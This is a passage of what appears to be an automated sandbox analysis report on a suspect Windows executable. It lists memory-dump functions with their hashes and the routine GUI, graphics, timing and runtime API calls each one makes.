                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                              • API String ID: 2487901850-572801152
                                                                                                                                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1871949834-0
                                                                                                                                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                              APIs
                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                              • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3611059338-0
                                                                                                                                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1640429340-0
                                                                                                                                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                              • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                              • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                              • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                              • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                              • _wcstok.LIBCMT ref: 00443931
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3632110297-0
                                                                                                                                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 752480666-0
                                                                                                                                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3275902921-0
                                                                                                                                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3275902921-0
                                                                                                                                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32 ref: 004555C7
                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3691411573-0
                                                                                                                                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                              • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                              • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 372113273-0
                                                                                                                                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                              • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                              • __lock.LIBCMT ref: 004170BE
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                              • _free.LIBCMT ref: 004170EE
                                                                                                                                              • InterlockedIncrement.KERNEL32(03012D90), ref: 00417106
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
